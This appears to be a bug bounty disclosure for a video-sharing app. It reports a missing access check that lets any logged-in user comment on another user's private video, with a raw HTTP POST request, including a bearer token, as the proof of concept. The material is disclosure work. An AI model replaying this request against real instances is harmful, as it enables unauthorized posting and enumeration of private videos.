Description

The app doesn’t check the status of video when making data changes. Normal users can create new comment or reply comment in private videos.

Proof of Concept

note: I’m using instance p.lu for testing

• Step 1: Login as video test1 and upload private video. Get video ID of private video
• Step 2: Call this request with Token from user test2

POST /api/v1/videos/53328/comment-threads HTTP/2
Host: p.lu
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Bearer d8163b600e3de89c6039af034a94bd3898d68825
Content-Type: application/json
Content-Length: 16
Origin: https://p.lu
Referer: https://p.lu/w/87rzixn5tGiFBA5iojv9RP
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"text":"hello"}

• Step 3: In browser of user test1, you can see count of like for video is 1.
• PoC:

send comment: https://drive.google.com/file/d/1qkNAeu5vSsdA7-PeWszHbIngiiLzk9u_/view?usp=sharing

comment in private video: https://drive.google.com/file/d/1jdIuH75caNHvTZob7vBtsvKkVKbz2pcF/view?usp=sharing

Impact

Attackers can create comment in private videos. It can be abused to list the id’s of private videos based on the response when making API call.